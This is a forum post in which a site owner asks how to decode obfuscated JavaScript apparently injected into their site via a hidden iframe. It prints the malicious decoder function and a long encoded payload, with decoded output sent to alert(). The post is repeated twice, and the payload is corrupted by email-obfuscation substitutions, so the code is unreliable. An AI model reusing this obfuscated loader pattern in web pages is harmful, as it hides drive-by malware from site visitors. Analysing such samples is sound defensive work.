Z
zsisco
Anyone have a quick way to decode the following script?
It seems to be malware and was linked into my site via a hidden iframe.
I want to take a look at the code.
Thanks!
<script language=JavaScript>
function dc(x)
{
var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,
t=Array(0,62,61,60,59,58,57,56,55,54,0,0,0,0,0,0,53,52,51,50,49,48,47,46,45,44,43,42,41,
40,39,38,37,36,35,34,33,32,31,30,29,28,27,0,0,0,0,26,0,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1,63);
for(j=Math.ceil(l/b);j>0;j--) {
r='';
for(i=Math.min(l,b);i>0;i--,l--)
{
w |= (t[x.charCodeAt(p++)-48]) << s;
if (s) {
r += String.fromCharCode(165^w&255);
w>>=8;
s-=2
} else {
s=6
}
}
alert("LINE: " + r);
}
}
dc("[email protected]@ncXAZS5Jww2CtsmBpFYTc8bCINbAndM8nkYTmhbAntmOx_6Cgl124wlzr8M2QkH6HZn3ttL3mw69eplRio64oGlTX4k5DBHN[email protected][email protected][email protected]@o_nDqNnE0FbApZVAcB3Cx8rRoOnEooYAmRbQitqRWZFCb9bAoC3C[email protected]QsXRdgIRfCrRwWqQjCbO[email protected][email protected][email protected]@[email protected]nC7OZ9aS9J3UcxqQn5q90kmDq8rB[email protected]ro34ZFbQgw11JsX7PoIQGFVN[email protected][email protected][email protected][email protected][email protected]@[email protected][email protected]@[email protected]@[email protected][email protected][email protected][email protected]@[email protected][email protected][email protected][email protected]@[email protected][email protected][email protected][email protected]@[email protected][email protected][email protected][email protected]@[email protected]@[email protected][email protected][email protected]mc69thz5TFb4eCX8e8I4o9I6DFFCnOnQ1saCLs15UwmEh5GzZo61OgY4Uz76gFmRTF794Zz5D8bQhp2DqZr8tSIQidWCCNnQqtq54zz4eG33etkRps62egY4Uz76FFmR[email protected]eoa7NNMQTJY6idmQeoWBswI6mwm2JslALoqQNo24e5L7npI6qgb7khY4Uz76FFmRjG79[email protected][email protected][email protected]jgz5TwX5ht62Tk29jwIQG4zzrsqRv8l7kW15UcX7odLz9w67SV14UVIQikMzXpqz4slRqwLziOY5TFl7es1SZFF2JRlRqpLAsgVA4B76QwGT[email protected]tok8pNn6gG7AiVzRUo67os698wm2ita5qpqQntVQYzV7JNYBxsXCk_aPq462mt1SpZVBncmQmwaNi4GTr8IEPsX4mVFA[email protected]iFq")
</script>
It seems to be malware and was linked into my site via a hidden iframe.
I want to take a look at the code.
Thanks!
<script language=JavaScript>
function dc(x)
{
var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,
t=Array(0,62,61,60,59,58,57,56,55,54,0,0,0,0,0,0,53,52,51,50,49,48,47,46,45,44,43,42,41,
40,39,38,37,36,35,34,33,32,31,30,29,28,27,0,0,0,0,26,0,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1,63);
for(j=Math.ceil(l/b);j>0;j--) {
r='';
for(i=Math.min(l,b);i>0;i--,l--)
{
w |= (t[x.charCodeAt(p++)-48]) << s;
if (s) {
r += String.fromCharCode(165^w&255);
w>>=8;
s-=2
} else {
s=6
}
}
alert("LINE: " + r);
}
}
dc("[email protected]@ncXAZS5Jww2CtsmBpFYTc8bCINbAndM8nkYTmhbAntmOx_6Cgl124wlzr8M2QkH6HZn3ttL3mw69eplRio64oGlTX4k5DBHN[email protected][email protected][email protected]@o_nDqNnE0FbApZVAcB3Cx8rRoOnEooYAmRbQitqRWZFCb9bAoC3C[email protected]QsXRdgIRfCrRwWqQjCbO[email protected][email protected][email protected]@[email protected]nC7OZ9aS9J3UcxqQn5q90kmDq8rB[email protected]ro34ZFbQgw11JsX7PoIQGFVN[email protected][email protected][email protected][email protected][email protected]@[email protected][email protected]@[email protected]@[email protected][email protected][email protected][email protected]@[email protected][email protected][email protected][email protected]@[email protected][email protected][email protected][email protected]@[email protected][email protected][email protected][email protected]@[email protected]@[email protected][email protected][email protected]mc69thz5TFb4eCX8e8I4o9I6DFFCnOnQ1saCLs15UwmEh5GzZo61OgY4Uz76gFmRTF794Zz5D8bQhp2DqZr8tSIQidWCCNnQqtq54zz4eG33etkRps62egY4Uz76FFmR[email protected]eoa7NNMQTJY6idmQeoWBswI6mwm2JslALoqQNo24e5L7npI6qgb7khY4Uz76FFmRjG79[email protected][email protected][email protected]jgz5TwX5ht62Tk29jwIQG4zzrsqRv8l7kW15UcX7odLz9w67SV14UVIQikMzXpqz4slRqwLziOY5TFl7es1SZFF2JRlRqpLAsgVA4B76QwGT[email protected]tok8pNn6gG7AiVzRUo67os698wm2ita5qpqQntVQYzV7JNYBxsXCk_aPq462mt1SpZVBncmQmwaNi4GTr8IEPsX4mVFA[email protected]iFq")
</script>